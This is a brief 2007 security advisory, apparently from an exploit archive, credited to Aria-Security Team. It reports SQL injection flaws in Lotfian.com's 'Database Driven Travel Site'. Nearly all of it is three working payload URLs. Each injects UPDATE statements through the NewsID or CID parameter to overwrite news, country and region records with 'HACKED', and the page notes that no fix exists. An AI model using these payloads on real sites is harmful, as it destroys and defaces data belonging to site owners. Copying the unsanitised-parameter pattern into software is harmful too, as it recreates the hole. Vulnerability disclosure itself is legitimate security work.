Lotfian.com DATABASE DRIVEN TRAVEL SITE SQL Injection Vuln

2007-12-10 00:00:00

Aria-Security Team
http://Aria-Security.Net
-----------------------------
DATABASE DRIVEN TRAVEL SITE
Vendor: Lotfian.com

NewsDetails.asp?NewsID=''UPDATE gtsNews set NewsDescription='HACKED' UPDATE gtsNews set NewsTitle='HACKED'

Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED'

RegionDetails.asp?CID=''UPDATE gtsCountryRegion set CountryRegionName='hacked';--

#

Fixes

No fixes

In order to submit a new fix you need to be registered.